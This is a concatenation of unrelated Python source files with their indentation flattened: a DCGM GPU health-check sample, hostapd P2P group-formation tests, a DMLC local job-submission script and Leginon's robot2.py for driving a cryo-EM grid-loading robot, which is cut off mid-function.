elif health == dcgm_structs.DCGM_HEALTH_RESULT_FAIL:
return "Fail"
else :
return "N/A"
## Worker function
def agent_worker_function(dcgmHandle, groupId):
NUM_ITERATIONS = 5
count = 0
groupId = groupId
## Add the health watches
newSystems = dcgm_structs.DCGM_HEALTH_WATCH_ALL
dcgm_agent.dcgmHealthSet(dcgmHandle, groupId, newSystems)
while True:
dcgm_agent.dcgmUpdateAllFields(dcgmHandle, 1)
try:
## Invoke Health checks
group_health = dcgm_agent.dcgmHealthCheck(dcgmHandle, groupId)
print("Overall Health for the group: %s" % convert_overall_health_to_string(group_health.overallHealth))
for index in range (0, group_health.gpuCount):
print("GPU ID : %d" % group_health.gpu[index].gpuId)
for incident in range (0, group_health.gpu[index].incidentCount):
print("system tested : %d" % group_health.gpu[index].systems[incident].system)
print("system health : %s" % convert_overall_health_to_string(group_health.gpu[index].systems[incident].health))
print("system health err : %s" % group_health.gpu[index].systems[incident].errorString)
print("\n")
except dcgm_structs.DCGMError as e:
errorCode = e.value
print("dcgmEngineHelathCheck returned error: %d" % errorCode)
sys.exc_clear()
count = count + 1
if count == NUM_ITERATIONS:
break
sleep(2)
## Main
def main():
    ## Initialize the DCGM Engine in manual operation mode. This implies that its execution is
## controlled by the monitoring agent. The user has to periodically call APIs such as
## dcgmEnginePolicyTrigger and dcgmEngineUpdateAllFields which tells DCGM to wake up and
## perform data collection and operations needed for policy management.
with RunDCGM('127.0.0.1', dcgm_structs.DCGM_OPERATION_MODE_MANUAL) as handle:
## Create a default group. (Default group is comprised of all the GPUs on the node)
        ## Let's call the group "all_gpus_group". The method returns an opaque handle (groupId) to
## identify the newly created group.
groupId = dcgm_agent.dcgmGroupCreate(handle, dcgm_structs.DCGM_GROUP_DEFAULT, "all_gpus_group")
## Invoke method to get information on the newly created group
groupInfo = dcgm_agent.dcgmGroupGetInfo(handle, groupId)
## Create reference to DCGM status handler which can be used to get the statuses for multiple
## operations on one or more devices present in the group
status_handle = dcgm_agent.dcgmStatusCreate()
## The worker function can be executed as a separate thread or as part of the main thread.
## Executed as a separate thread here
thread = Thread(target = agent_worker_function, args = (handle, groupId))
thread.start()
##########################################
# Any other useful work can be placed here
##########################################
thread.join()
print("Worker thread completed")
## Destroy the group
try:
dcgm_agent.dcgmGroupDestroy(handle, groupId)
except dcgm_structs.DCGMError as e:
print("Failed to remove the test group, error: %s" % e, file=sys.stderr)
sys.exit(1)
## Destroy the status handle
try:
dcgm_agent.dcgmStatusDestroy(status_handle)
except dcgm_structs.DCGMError as e:
print("Failed to remove status handler, error: %s" % e, file=sys.stderr)
sys.exit(1)
if __name__ == '__main__':
main()
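# Note: this sample relies on the DCGM Python bindings (dcgm_structs, dcgm_fields, dcgm_agent,
# dcgmvalue) being importable from the parent directory, which is why sys.path is extended at
# the top of the file.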
|
test_p2p_grpform.py
|
#!/usr/bin/python
#
# P2P group formation test cases
# Copyright (c) 2013, Jouni Malinen <j@w1.fi>
#
# This software may be distributed under the terms of the BSD license.
# See README for more details.
import logging
logger = logging.getLogger(__name__)
import time
import threading
import Queue
import hwsim_utils
def check_grpform_results(i_res, r_res):
if i_res['result'] != 'success' or r_res['result'] != 'success':
raise Exception("Failed group formation")
if i_res['ssid'] != r_res['ssid']:
raise Exception("SSID mismatch")
if i_res['freq'] != r_res['freq']:
raise Exception("SSID mismatch")
if i_res['go_dev_addr'] != r_res['go_dev_addr']:
raise Exception("GO Device Address mismatch")
def go_neg_init(i_dev, r_dev, pin, i_method, i_intent, res):
logger.debug("Initiate GO Negotiation from i_dev")
i_res = i_dev.p2p_go_neg_init(r_dev.p2p_dev_addr(), pin, i_method, timeout=15, go_intent=i_intent)
logger.debug("i_res: " + str(i_res))
res.put(i_res)
def go_neg_pin(i_dev, r_dev, i_intent=None, r_intent=None, i_method='enter', r_method='display'):
r_dev.p2p_listen()
i_dev.p2p_listen()
pin = r_dev.wps_read_pin()
logger.info("Start GO negotiation " + i_dev.ifname + " -> " + r_dev.ifname)
r_dev.dump_monitor()
res = Queue.Queue()
t = threading.Thread(target=go_neg_init, args=(i_dev, r_dev, pin, i_method, i_intent, res))
t.start()
logger.debug("Wait for GO Negotiation Request on r_dev")
ev = r_dev.wait_event(["P2P-GO-NEG-REQUEST"], timeout=15)
if ev is None:
raise Exception("GO Negotiation timed out")
r_dev.dump_monitor()
logger.debug("Re-initiate GO Negotiation from r_dev")
r_res = r_dev.p2p_go_neg_init(i_dev.p2p_dev_addr(), pin, r_method, go_intent=r_intent, timeout=15)
logger.debug("r_res: " + str(r_res))
r_dev.dump_monitor()
t.join()
i_res = res.get()
logger.debug("i_res: " + str(i_res))
logger.info("Group formed")
hwsim_utils.test_connectivity_p2p(r_dev, i_dev)
i_dev.dump_monitor()
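# go_neg_pin above drives both ends of the PIN-based negotiation: the initiator runs in a worker
# thread via go_neg_init while the responder waits for the P2P-GO-NEG-REQUEST event and then
# re-initiates with the shared PIN; go_neg_pin_authorized below instead pre-authorizes the
# responder, so no re-initiation is needed.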
def go_neg_pin_authorized(i_dev, r_dev, i_intent=None, r_intent=None, expect_failure=False, i_go_neg_status=None, i_method='enter', r_method='display'):
r_dev.p2p_listen()
i_dev.p2p_listen()
pin = r_dev.wps_read_pin()
logger.info("Start GO negotiation " + i_dev.ifname + " -> " + r_dev.ifname)
r_dev.p2p_go_neg_auth(i_dev.p2p_dev_addr(), pin, r_method, go_intent=r_intent)
i_res = i_dev.p2p_go_neg_init(r_dev.p2p_dev_addr(), pin, i_method, timeout=15, go_intent=i_intent, expect_failure=expect_failure)
r_res = r_dev.p2p_go_neg_auth_result(expect_failure=expect_failure)
logger.debug("i_res: " + str(i_res))
logger.debug("r_res: " + str(r_res))
r_dev.dump_monitor()
i_dev.dump_monitor()
if i_go_neg_status:
if i_res['result'] != 'go-neg-failed':
raise Exception("Expected GO Negotiation failure not reported")
if i_res['status'] != i_go_neg_status:
raise Exception("Expected GO Negotiation status not seen")
if expect_failure:
return
logger.info("Group formed")
hwsim_utils.test_connectivity_p2p(r_dev, i_dev)
def go_neg_init_pbc(i_dev, r_dev, i_intent, res):
logger.debug("Initiate GO Negotiation from i_dev")
i_res = i_dev.p2p_go_neg_init(r_dev.p2p_dev_addr(), None, "pbc", timeout=15, go_intent=i_intent)
logger.debug("i_res: " + str(i_res))
res.put(i_res)
def go_neg_pbc(i_dev, r_dev, i_intent=None, r_intent=None):
r_dev.p2p_find(social=True)
i_dev.p2p_find(social=True)
logger.info("Start GO negotiation " + i_dev.ifname + " -> " + r_dev.ifname)
r_dev.dump_monitor()
res = Queue.Queue()
t = threading.Thread(target=go_neg_init_pbc, args=(i_dev, r_dev, i_intent, res))
t.start()
logger.debug("Wait for GO Negotiation Request on r_dev")
ev = r_dev.wait_event(["P2P-GO-NEG-REQUEST"], timeout=15)
if ev is None:
raise Exception("GO Negotiation timed out")
r_dev.dump_monitor()
logger.debug("Re-initiate GO Negotiation from r_dev")
r_res = r_dev.p2p_go_neg_init(i_dev.p2p_dev_addr(), None, "pbc", go_intent=r_intent, timeout=15)
logger.debug("r_res: " + str(r_res))
r_dev.dump_monitor()
t.join()
i_res = res.get()
logger.debug("i_res: " + str(i_res))
logger.info("Group formed")
hwsim_utils.test_connectivity_p2p(r_dev, i_dev)
i_dev.dump_monitor()
return [i_res, r_res]
def test_grpform(dev):
"""P2P group formation using PIN and authorized connection (init -> GO)"""
go_neg_pin_authorized(i_dev=dev[0], i_intent=15, r_dev=dev[1], r_intent=0)
dev[0].remove_group()
try:
dev[1].remove_group()
except:
pass
def test_grpform2(dev):
"""P2P group formation using PIN and authorized connection (resp -> GO)"""
go_neg_pin_authorized(i_dev=dev[0], i_intent=0, r_dev=dev[1], r_intent=15)
dev[0].remove_group()
try:
dev[1].remove_group()
except:
pass
def test_grpform3(dev):
"""P2P group formation using PIN and re-init GO Negotiation"""
go_neg_pin(i_dev=dev[0], i_intent=15, r_dev=dev[1], r_intent=0)
dev[0].remove_group()
try:
dev[1].remove_group()
except:
pass
def test_grpform_pbc(dev):
"""P2P group formation using PBC and re-init GO Negotiation"""
[i_res, r_res] = go_neg_pbc(i_dev=dev[0], i_intent=15, r_dev=dev[1], r_intent=0)
check_grpform_results(i_res, r_res)
if i_res['role'] != 'GO' or r_res['role'] != 'client':
raise Exception("Unexpected device roles")
dev[0].remove_group()
try:
dev[1].remove_group()
except:
pass
def test_both_go_intent_15(dev):
"""P2P GO Negotiation with both devices using GO intent 15"""
go_neg_pin_authorized(i_dev=dev[0], i_intent=15, r_dev=dev[1], r_intent=15, expect_failure=True, i_go_neg_status=9)
def test_both_go_neg_display(dev):
"""P2P GO Negotiation with both devices trying to display PIN"""
go_neg_pin_authorized(i_dev=dev[0], r_dev=dev[1], expect_failure=True, i_go_neg_status=10, i_method='display', r_method='display')
def test_both_go_neg_enter(dev):
"""P2P GO Negotiation with both devices trying to enter PIN"""
go_neg_pin_authorized(i_dev=dev[0], r_dev=dev[1], expect_failure=True, i_go_neg_status=10, i_method='enter', r_method='enter')
|
dmlc_local.py
|
#!/usr/bin/env python
"""
DMLC submission script, local machine version
"""
import argparse
import sys
import os
import subprocess
from threading import Thread
import tracker
import signal
import logging
parser = argparse.ArgumentParser(description='DMLC script to submit dmlc jobs as local process')
parser.add_argument('-n', '--nworker', required=True, type=int,
help = 'number of worker nodes to be launched')
parser.add_argument('-s', '--server-nodes', default = 0, type=int,
help = 'number of server nodes to be launched')
parser.add_argument('--log-level', default='INFO', type=str,
choices=['INFO', 'DEBUG'],
help = 'logging level')
parser.add_argument('--log-file', type=str,
help = 'output log to the specific log file')
parser.add_argument('command', nargs='+',
help = 'command for launching the program')
args, unknown = parser.parse_known_args()
keepalive = """
nrep=0
rc=254
while [ $rc -eq 254 ];
do
export DMLC_NUM_ATTEMPT=$nrep
%s
rc=$?;
nrep=$((nrep+1));
done
"""
def exec_cmd(cmd, role, taskid, pass_env):
if cmd[0].find('/') == -1 and os.path.exists(cmd[0]) and os.name != 'nt':
cmd[0] = './' + cmd[0]
cmd = ' '.join(cmd)
env = os.environ.copy()
for k, v in pass_env.items():
env[k] = str(v)
env['DMLC_TASK_ID'] = str(taskid)
env['DMLC_ROLE'] = role
ntrial = 0
while True:
if os.name == 'nt':
env['DMLC_NUM_ATTEMPT'] = str(ntrial)
ret = subprocess.call(cmd, shell=True, env = env)
if ret == 254:
ntrial += 1
continue
else:
bash = keepalive % (cmd)
ret = subprocess.call(bash, shell=True, executable='bash', env = env)
if ret == 0:
            logging.debug('Task %d exited with code 0', taskid)
return
else:
if os.name == 'nt':
                sys.exit(-1)
else:
raise Exception('Get nonzero return code=%d' % ret)
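# Exit code 254 is used as the "please retry" convention: on Windows the Python loop above
# re-runs the command with an incremented DMLC_NUM_ATTEMPT, while on other platforms the
# keepalive shell snippet performs the same retry loop.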
#
# Note: this submit script is only used for demo purpose
# submission script using python multi-threading
#
def mthread_submit(nworker, nserver, envs):
"""
    customized submit script that submits nworker + nserver local jobs, each running args.command
    note this can be a lambda function containing additional parameters in input
    Parameters
       nworker number of worker processes to start up
       nserver number of server nodes to start up
       envs    environment variables to be added to the started programs
"""
procs = {}
for i in range(nworker + nserver):
if i < nworker:
role = 'worker'
else:
role = 'server'
procs[i] = Thread(target = exec_cmd, args = (args.command, role, i, envs))
procs[i].setDaemon(True)
procs[i].start()
tracker.config_logger(args)
# call submit, with nslave, the commands to run each job and submit function
tracker.submit(args.nworker, args.server_nodes, fun_submit = mthread_submit,
pscmd= (' '.join(args.command) + ' ' + ' '.join(unknown)))
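# Illustrative invocation (hypothetical program name): launch 2 workers and 1 server locally:
#   python dmlc_local.py -n 2 -s 1 ./my_dmlc_program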
|
robot2.py
|
#
# COPYRIGHT:
# The Leginon software is Copyright 2003
# The Scripps Research Institute, La Jolla, CA
# For terms of the license agreement
# see http://ami.scripps.edu/software/leginon-license
#
from PIL import Image
import sys
import threading
import time
from leginon import leginondata
import emailnotification
import event
import instrument
import node
import project
import gui.wx.Robot
import Queue
import sinedon
# ...
def seconds2str(seconds):
seconds = int(seconds)
minute = 60
hour = 60*minute
day = 24*hour
week = 7*day
weeks = seconds / week
string = ''
if weeks:
if weeks == 1:
value = ''
else:
value = 's'
string += '%i week%s, ' % (weeks, value)
seconds %= week
days = seconds / day
if days or string:
if days == 1:
value = ''
else:
value = 's'
string += '%i day%s, ' % (days, value)
seconds %= day
hours = seconds / hour
if hours or string:
if hours == 1:
value = ''
else:
value = 's'
string += '%i hour%s, ' % (hours, value)
seconds %= hour
minutes = seconds / minute
if minutes or string:
if minutes == 1:
value = ''
else:
value = 's'
string += '%i minute%s, ' % (minutes, value)
seconds %= minute
if seconds or string:
if seconds == 1:
value = ''
else:
value = 's'
string += '%i second%s' % (seconds, value)
return string
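# For example (Python 2 integer division, as used above):
#   seconds2str(3661) returns '1 hour, 1 minute, 1 second'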
## these are the names of the robot attributes
robotattrs = ['Signal' + str(i) for i in range(0,13)]
robotattrs.append('gridNumber')
class TestCommunication(object):
def __init__(self):
self.gridNumber = -1
for a in robotattrs:
setattr(self, a, 0)
robotattrtypemap = [(robotattr, int) for robotattr in robotattrs]
class RobotAttributes(sinedon.Data):
"sinedon object to contain robot attributes"
def typemap(cls):
return sinedon.Data.typemap() + tuple(robotattrtypemap)
typemap = classmethod(typemap)
class DatabaseCommunication(object):
def __setattr__(self, name, value):
print 'SET', name, value
## get current robot attrs from DB
rattrs = RobotAttributes().query(results=1)
if rattrs:
# copy the old one
rattrs = RobotAttributes(initializer=rattrs[0])
else:
            # create a new one if none exists yet
rattrs = RobotAttributes()
## update one of the attrs
rattrs[name] = value
## store new attrs to DB
rattrs.insert(force=True)
def __getattr__(self, name):
## get current robot attrs from DB
rattrs = RobotAttributes().query(results=1)
if rattrs is None:
return None
else:
return rattrs[0][name]
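# DatabaseCommunication persists every attribute access through sinedon: __setattr__ copies the
# most recent RobotAttributes row, updates the one field and inserts a new row, while __getattr__
# reads the field back from the latest row, so robot signals are exchanged through the database
# rather than held in memory.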
class RobotException(Exception):
pass
class GridException(Exception):
pass
class GridQueueEmpty(GridException):
pass
class GridLoadError(GridException):
pass
class GridLoadFromTrayError(GridException):
pass
class GridUnloadError(GridException):
pass
def validateGridNumber(gridnumber):
if not isinstance(gridnumber, int):
return False
if gridnumber >= 1 and gridnumber <= 96:
return True
else:
return False
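# For example: validateGridNumber(5) is True, while validateGridNumber(0) and
# validateGridNumber("5") are False (only ints from 1 to 96 are accepted).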
class Request(object):
def __init__(self):
self.event = threading.Event()
class ExitRequest(Request):
pass
class GridRequest(Request):
def __init__(self, number, gridid=None, node=None, griddata=None):
Request.__init__(self)
self.number = number
self.loaded = False
self.gridid = gridid
self.node = node
self.griddata = griddata
class Robot2(node.Node):
panelclass = gui.wx.Robot.Panel
eventinputs = node.Node.eventinputs + [event.TargetListDoneEvent,
event.UnloadGridEvent,
event.QueueGridEvent,
event.QueueGridsEvent,
event.MosaicDoneEvent]
eventoutputs = node.Node.eventoutputs + [event.MakeTargetListEvent,
event.GridLoadedEvent,
event.EmailEvent]
settingsclass = leginondata.RobotSettingsData
defaultsettings = {
'column pressure threshold': 3.5e-5,
'default Z position': 0,
'simulate': True,
'turbo on': True,
'pause': False,
'grid tray': None,
'grid clear wait': False,
}
defaultcolumnpressurethreshold = 3.5e-5
defaultzposition = 0
def __init__(self, id, session, managerlocation, **kwargs):
node.Node.__init__(self, id, session, managerlocation, **kwargs)
self.instrument = instrument.Proxy(self.objectservice, self.session)
self.timings = {}
self.gridnumber = None
self.startevent = threading.Event()
self.exitevent = threading.Event()
self.extractinfo = None
self.extractcondition = threading.Condition()
self.gridcleared = threading.Event()
self.usercontinue = threading.Event()
self.emailclient = emailnotification.EmailClient(self)
self.simulate = False
self.startnowait = False
self.traysFromDB()
self.queue = Queue.Queue()
threading.Thread(name='robot control queue handler thread',
target=self._queueHandler).start()
self.addEventInput(event.MosaicDoneEvent, self.handleGridDataCollectionDone)
self.addEventInput(event.TargetListDoneEvent,
self.handleGridDataCollectionDone)
self.addEventInput(event.QueueGridEvent, self.handleQueueGrid)
self.addEventInput(event.QueueGridsEvent, self.handleQueueGrids)
self.addEventInput(event.UnloadGridEvent, self.handleUnloadGrid)
self.start()
def traysFromDB(self):
# note: if two trays share the same label, these lookup maps will collide
self.gridtrayids = {}
self.gridtraylabels = {}
try:
projectdata = project.ProjectData()
gridboxes = projectdata.getGridBoxes()
for i in gridboxes.getall():
self.gridtrayids[i['label']] = i['gridboxId']
self.gridtraylabels[i['gridboxId']] = i['label']
except Exception, e:
self.logger.error('Failed to connect to the project database: %s' % e)
def userContinue(self):
self.usercontinue.set()
def handleQueueGrids(self, ievent):
'''
Handle queue of grids from another node.
Wait for user to click start before inserting into the queue.
'''
# wait for user to start
self.logger.info('Grid load request has been made, press \'Start\' button to begin processing')
self.setStatus('user input')
self.startevent.clear()
self.startevent.wait()
nodename = ievent['node']
# insert all the grids before handling them
for gridid in ievent['grid IDs']:
number = self.getGridNumber(gridid)
while number is None:
self.setStatus('idle')
self.logger.info('Waiting for user to switch tray')
self.setStatus('user input')
self.panel.onWaitForTrayChanged()
self.startevent.clear()
self.startevent.wait()
number = self.getGridNumber(gridid)
request = GridRequest(number, gridid, nodename)
self.queue.put(request)
self.startnowait = True
self._queueHandler()
def handleQueueGrid(self, ievent):
newevent = {}
newevent['node'] = ievent['node']
newevent['grid IDs'] = [ievent['grid ID'],]
self.handleQueueGrids(newevent)
def handleUnloadGrid(self, evt):
gridid = evt['grid ID']
node = evt['node']
self.extractcondition.acquire()
self.extractinfo = (gridid, node)
self.extractcondition.notify()
self.extractcondition.release()
def getCommunication(self):
if self.settings['simulate']:
self.simulate = True
return TestCommunication()
try:
com = DatabaseCommunication()
self.simulate = False
except:
com = TestCommunication()
self.simulate = True
return com
def _queueHandler(self):
self.logger.info('_queueHandler simulate=%s setting=%s' % (self.simulate, self.settings['simulate']))
self.communication = self.getCommunication()
request = None
self.communication.Signal11 = int(self.settings['grid clear wait'])
while True:
### need to wait if something goes wrong
if not self.startnowait:
self.usercontinue.clear()
self.logger.warning('You may need to click the "Continue" tool after clicking "Start" to begin')
self.usercontinue.wait()
self.zeroStage()
if self.exitevent.isSet():
break
while True:
try:
request = self.queue.get(block=False)
if isinstance(request, ExitRequest):
break
except Queue.Empty:
request = self.getUserGridRequest()
if request is None:
self.startnowait = False
break
gridid = request.gridid
evt = event.GridLoadedEvent()
evt['request node'] = request.node
evt['grid'] = leginondata.GridData(initializer={'grid ID': gridid})
evt['status'] = 'failed'
gridnumber = request.number
if gridnumber is None:
evt['status'] = 'invalid'
self.outputEvent(evt)
return
self.selectGrid(gridnumber)
self.communication = self.getCommunication()
self.setStatus('processing')
self.selectGrid(gridnumber)
self.logger.info('grid selected')
self.gridnumber = gridnumber
try:
griddata = self.insert()
except GridLoadError:
self.gridnumber = None
continue
except GridLoadFromTrayError:
self.gridnumber = None
self.startnowait = True
self.outputEvent(evt)
request.event.set()
continue
self.setStatus('idle')
evt['grid'] = griddata
if griddata is None:
break
self.startnowait = False
if hasattr(request, 'loaded'):
evt['status'] = 'ok'
if hasattr(request, 'griddata'):
request.griddata = griddata
self.outputEvent(evt)
request.event.set()
self.extractcondition.acquire()
if request.gridid is None and request.node is None:
self.panel.gridInserted()
while (self.extractinfo is None
or self.extractinfo != (request.gridid, request.node)):
self.extractcondition.wait()
self.communication = self.getCommunication()
self.setStatus('processing')
self.extractinfo = None
self.extractcondition.release()
self.extract()
self.gridnumber = None
self.setStatus('idle')
self.setStatus('idle')
self.panel.gridQueueEmpty()
del self.communication
def startProcessing(self):
self.startevent.set()
def exit(self):
self.exitevent.set()
self.startevent.set()
node.Node.exit(self)
def lockScope(self):
self.logger.info('Locking scope...')
self.instrument.tem.lock()
self.logger.info('Scope locked.')
def unlockScope(self):
self.logger.info('Unlocking scope...')
self.instrument.tem.unlock()
self.logger.info('Scope unlocked.')
def zeroStage(self):
while True:
self.logger.info('Zeroing stage position...')
self.instrument.tem.StagePosition = {'x': 0.0, 'y': 0.0, 'z': 0.0, 'a': 0.0}
if self.stageIsZeroed():
break
else:
self.logger.info('Stage is not zeroed, trying again...')
self.logger.info('Stage position is zeroed.')
def stageIsZeroed(self, xyzlimit=1e-6, alimit=0.001):
stage = self.instrument.tem.StagePosition
x = abs(stage['x'])
y = abs(stage['y'])
z = abs(stage['z'])
a = abs(stage['a'])
if x<xyzlimit and y<xyzlimit and z<xyzlimit and a<alimit:
return True
else:
return False
def moveStagePositionZ(self,zval):
self.logger.info("Move stage position Z to: %s",zval)
self.instrument.tem.StagePosition = {'z': zval}
def holderNotInScope(self):
self.logger.info('Verifying there is no holder inserted...')
self.waitScope('HolderStatus', 'not inserted')
self.logger.info('No holder currently inserted.')
def holderInScope(self):
self.logger.info('Verifying holder is inserted...')
self.waitScope('HolderStatus', 'inserted')
self.logger.info('Holder is currently inserted.')
def vacuumReady(self):
self.logger.info('Verifying vacuum is ready...')
self.waitScope('VacuumStatus', 'ready', 0.25)
self.logger.info('Vacuum is ready.')
def openColumnValves(self):
self.logger.info('Opening column valves...')
self.instrument.tem.ColumnValvePosition = 'open'
self.logger.info('Verifying column valves are open...')
self.waitScope('ColumnValvePosition', 'open', 0.25)
self.logger.info('Column valves are open.')
def closeColumnValves(self):
self.logger.info('Closing column valves...')
self.instrument.tem.ColumnValvePosition = 'closed'
self.logger.info('Verifying column valves are closed...')
self.waitScope('ColumnValvePosition', 'closed', 0.25)
self.logger.info('Column valves are closed.')
def turboPumpOn(self):
self.logger.info('Turning on turbo pump...')
self.instrument.tem.TurboPump = 'on'
self.logger.info('Verifying turbo pump is on...')
self.waitScope('TurboPump', 'on', 0.25)
self.logger.info('Turbo pump is on.')
def turboPumpOff(self):
self.logger.info('Turning off turbo pump...')
self.instrument.tem.TurboPump = 'off'
#self.logger.info('Verifying turbo pump is off...')
#self.waitScope('TurboPump', 'off', 0.25)
self.logger.info('Turbo pump is off.')
def stageReady(self):
self.logger.info('Waiting for stage to be ready...')
self.waitScope('StageStatus', 'ready', 0.25)
self.logger.info('Stage is ready...')
def setHolderType(self):
#type = 'single tilt'
type = 'cryo'
self.logger.info('Setting holder type to %s...' % (type,))
self.instrument.tem.HolderType = type
self.logger.info('Verifying holder type is set to %s...' % (type,))
self.waitScope('HolderType', type, 0.25)
self.logger.info('Holder type is set to %s.' % (type,))
def getColumnPressureThreshold(self):
threshold = self.settings['column pressure threshold']
if threshold is None:
threshold = self.defaultcolumnpressurethreshold
return threshold
def getDefaultZPosition(self):
defzposition = self.settings['default Z position']
if defzposition is None:
defzposition = self.defaultzposition
return defzposition
def checkColumnPressure(self):
threshold = self.getColumnPressureThreshold()
self.logger.info('Checking column pressure...')
while self.instrument.tem.ColumnPressure > threshold:
time.sleep(0.1)
threshold = self.getColumnPressureThreshold()
self.logger.info('Column pressure is below threshold.')
def checkHighTensionOn(self):
self.logger.info('Checking high tension state...')
self.waitScope('HighTensionState', 'on', 0.25)
self.logger.info('High tension is on.')
def insertCameras(self):
ccdcameras = self.instrument.getCCDCameraNames()
for ccdcamera in ccdcameras:
self.instrument.setCCDCamera(ccdcamera)
if self.instrument.ccdcamera.hasAttribute('Inserted'):
self.logger.info('Inserting %s camera...' % ccdcamera)
self.instrument.ccdcamera.Inserted = True
self.waitScope('Inserted', True, 0.25)
self.logger.info('%s camera is inserted.' % ccdcamera)
def retractCameras(self):
ccdcameras = self.instrument.getCCDCameraNames()
for ccdcamera in ccdcameras:
self.instrument.setCCDCamera(ccdcamera)
if self.instrument.ccdcamera.hasAttribute('Inserted'):
self.logger.info('Retracting %s camera...' % ccdcamera)
self.instrument.ccdcamera.Inserted = False
self.waitScope('Inserted', False, 0.25)
self.logger.info('%s camera is retracted.' % ccdcamera)
def scopeReadyForInsertion1(self):
self.logger.info('Readying microscope for insertion step 1...')
self.zeroStage()
self.holderNotInScope()
self.vacuumReady()
self.closeColumnValves()
self.stageReady()
self.logger.info('Microscope ready for insertion step 1.')
def scopeReadyForInsertion2(self):
self.logger.info('Readying microscope for insertion step 2...')
self.setHolderType()
self.stageReady()
self.logger.info('Microscope ready for insertion step 2.')
def scopeReadyForExtraction(self):
self.logger.info('Readying microscope for extraction...')
self.closeColumnValves()
self.retractCameras()
self.zeroStage()
self.holderInScope()
self.vacuumReady()
self.stageReady()
self.logger.info('Microscope ready for extraction.')
def scopeReadyForImaging(self):
self.logger.info('Readying microscope for imaging...')
if not self.settings['turbo on']:
self.turboPumpOff()
self.insertCameras()
self.checkHighTensionOn()
self.vacuumReady()
zposition = self.getDefaultZPosition()
if zposition:
self.moveStagePositionZ(zposition)
self.checkColumnPressure()
self.openColumnValves()
self.logger.info('Microscope ready for imaging.')
def signalRobotToInsert1(self):
self.logger.info('Signaling robot to begin insertion step 1')
self.communication.Signal1 = 1
self.logger.info('Signaled robot to begin insertion step 1')
def signalRobotToInsert2(self):
self.logger.info('Signaling robot to begin insertion step 2')
self.communication.Signal3 = 1
self.logger.info('Signaled robot to begin insertion step 2')
def signalRobotToExtract(self):
self.logger.info('Signaling robot to begin extraction')
self.communication.Signal6 = 1
self.logger.info('Signaled robot to begin extraction')
def emailGridClear(self, gridnumber):
m = 'Grid #%s failed to be removed from specimen holder properly'
subject = m % gridnumber
text = 'Reply to this message if grid is not in the specimen holder.\n' + \
'An image of the specimen holder is attached.'
time.sleep(5.0)
try:
# image attachment is not implemented; raising here falls through to the
# except clause so the email is sent without an attachment
raise NotImplementedError
image = Image.open(imagefilename)
imagestring = emailnotification.PILImage2String(image)
except:
imagestring = None
self.emailclient.sendAndSet(self.gridcleared, subject, text, imagestring)
def waitForGridClear(self):
self.gridcleared.clear()
self.logger.warning('Waiting for confirmation that grid is clear')
self.setStatus('user input')
self.emailGridClear(self.gridnumber)
self.panel.clearGrid()
self.gridcleared.wait()
self.gridcleared = threading.Event()
self.communication.Signal10 = 1
def autoGridClear(self):
self.gridcleared.clear()
self.logger.info('Auto probe clearing')
self.communication.Signal10 = 1
def gridCleared(self):
self.gridcleared.set()
def waitForRobotToInsert1(self):
self.logger.info('Waiting for robot to complete insertion step 1')
while not self.communication.Signal2:
time.sleep(0.5)
self.communication.Signal2 = 0
self.logger.info('Robot has completed insertion step 1')
def waitForRobotToInsert2(self):
self.logger.info('Waiting for robot to complete insertion step 2')
while not self.communication.Signal4:
time.sleep(0.5)
self.communication.Signal4 = 0
self.logger.info('Robot has completed insertion step 2')
def robotReadyForExtraction(self):
self.logger.info('Verifying robot is ready for extraction')
while not self.communication.Signal5:
time.sleep(0.5)
self.communication.Signal5 = 0
self.logger.info('Robot is ready for extraction')
def waitForRobotToExtract(self):
self.logger.info('Waiting for robot to complete extraction')
while not self.communication.Signal7:
self.communication.Signal11 = int(self.settings['grid clear wait'])
if self.communication.Signal9:
self.logger.warning('Robot failed to remove grid from specimen holder')
if self.communication.Signal11 == 0:
self.autoGridClear()
else:
self.waitForGridClear()
self.communication.Signal9 = 0
self.setStatus('processing')
self.logger.info('Resuming operation')
time.sleep(0.5)
self.communication.Signal7 = 0
self.logger.info('Robot has completed extraction')
def getUserGridRequest(self):
gridnumber = -1
while not validateGridNumber(gridnumber):
gridnumber = self.panel.getNextGrid()
if gridnumber is None:
return None
return GridRequest(gridnumber)
def newGrid(self, gridboxid, gridnumber):
try:
projectdata = project.ProjectData()
except project.NotConnectedError, e:
self.logger.error('Failed to create grid information: %s' % e)
return None
return projectdata.newGrid('Robot Generated Grid #%d' % gridnumber,
-1, gridnumber, gridboxid, gridnumber)
def getGridNumber(self, gridid):
try:
projectdata = project.ProjectData()
except project.NotConnectedError, e:
self.logger.error('Failed to find grid information: %s' % e)
return None
grids = projectdata.getGrids()
gridsindex = grids.Index(['gridId'])
grid = gridsindex[gridid].fetchone()
if grid is None:
self.logger.error('Failed to find grid information for grid id %s' % gridid)
return None
gridlabel = grid['label']
if grid['boxId'] != self.gridtrayid:
boxlabel = self.gridtraylabels[grid['boxId']]
self.logger.error('Grid "%s" is not in the selected grid tray; it is in "%s"' % (gridlabel,boxlabel))
return None
gridlocations = projectdata.getGridLocations()
gridlocationsindex = gridlocations.Index(['gridId'])
gridlocation = gridlocationsindex[gridid].fetchone()
if gridlocation is None:
self.logger.error('Failed to find grid number for grid "%s"' % (gridlabel))
return None
if gridlocation['gridboxId'] != self.gridtrayid:
boxlabel = self.gridtraylabels[gridlocation['gridboxId']]
self.logger.error('Last known location of grid "%s" is in tray "%s", not in the selected tray' % (gridlabel,boxlabel))
return None
return int(gridlocation['location'])
def getGridID(self, gridboxid, gridnumber):
try:
projectdata = project.ProjectData()
except project.NotConnectedError, e:
self.logger.error('Failed to find grid information: %s' % e)
return None
gridlocations = projectdata.getGridLocations()
gridboxidindex = gridlocations.Index(['gridboxId'])
gridlocations = gridboxidindex[gridboxid].fetchall()
for gridlocation in gridlocations:
if gridlocation['location'] == gridnumber:
return gridlocation['gridId']
return self.newGrid(gridboxid, gridnumber)
def publishEMGridData(self,gridid):
try:
projectdata = project.ProjectData()
except project.NotConnectedError, e:
self.logger.error('Failed to get grid labels: %s' % e)
return None
gridinfo = projectdata.getGridInfo(gridid)
emgriddata = leginondata.EMGridData()
emgriddata['name'] = gridinfo['label']
emgriddata['project'] = gridinfo['projectId']
self.publish(emgriddata, database=True)
return emgriddata
def makeGridData(self, gridnumber):
gridid = self.getGridID(self.gridtrayid, gridnumber)
if gridid is None:
return None
emgriddata = self.publishEMGridData(gridid)
initializer = {'grid ID': gridid}
querydata = leginondata.GridData(initializer=initializer)
griddatalist = self.research(querydata)
insertion = 0
for griddata in griddatalist:
if griddata['insertion'] > insertion:
insertion = griddata['insertion']
initializer = {'grid ID': gridid, 'insertion': insertion + 1, 'emgrid': emgriddata}
griddata = leginondata.GridData(initializer=initializer)
